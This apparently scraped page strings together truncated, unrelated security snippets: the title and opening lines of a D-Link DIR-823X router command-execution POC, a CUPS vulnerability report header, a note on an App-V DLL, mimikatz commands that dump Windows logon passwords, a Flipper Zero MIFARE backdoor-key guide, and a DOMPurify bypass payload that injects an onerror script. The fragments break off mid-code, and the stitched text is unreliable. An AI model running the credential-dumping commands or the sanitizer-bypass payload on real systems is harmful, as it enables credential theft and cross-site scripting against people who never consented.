gavz

D-Link DIR-823X AX3000 Dual-Band Gigabit Wireless Router Remote Command Execution POC

Manufacturer's official website

D-Link | Welcome (dlink.com.cn)

Device model

DIR-823X AX3000 Dual-Band Gigabit Wireless Router

Binary Ninja Python API Cheat Sheet

This is a work in progress by someone who is learning about Binary Ninja.

References

Metadata Details

Get database name

Original report

Affected Vendor: OpenPrinting
Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
Affected Version: All versions <= 2.0.1 (latest release) and master.
Significant ICS/OT impact? no
Reporter: Simone Margaritelli [evilsocket@gmail.com]
Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:

https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8

IllBeBack - An Undocumented Function

Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.

AppVTerminator.dll

One App-V library stands out from all the rest because it only has one exported function named IllBeBack... That's right! A library signed by Microsoft, with Terminator in the name, that only has a single callable function named IllBeBack.

	/**
	* Description:
	* You can decode the hidden message by running the program.
	* Compile and execute: user@host:~$ javac A.java && java A
	*
	* @author Bipin Jitiya
	* @since 2024-12-17
	*/
	class A {
	public static void main(String[] args){

	from __future__ import print_function
	import requests
	import base64

	# curl to python requests
	# https://curl.trillworks.com/

	home_url = 'http://192.168.1.170/'

	session = requests.Session()

	/**
	LCG output...
	lcg(1) : 40B2947B
	lcg(2) : 73718F14
	lcg(3) : 6203F04B
	lcg(4) : 1BB91A70
	lcg(5) : 0CFC23E0

	ICG output...
	icg(5) : 0CFC23E0


	#general
	privilege::debug
	log
	log customlogfilename.log


	#sekurlsa
	sekurlsa::logonpasswords
	sekurlsa::logonPasswords full

	Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called .fap (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`.

	Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment.

	### Step 1: Set Up the Development Environment

	1. Install Flipper Zero SDK:
	- Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment.

	2. Clone the Flipper Zero Firmware:

	const createDOMPurify = require("dompurify");
	const { JSDOM } = require("jsdom");
	const http = require("http");

	const server = http.createServer((req, res) => {
	const window = new JSDOM("").window;
	const DOMPurify = createDOMPurify(window);
	const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);

	res.statusCode = 200;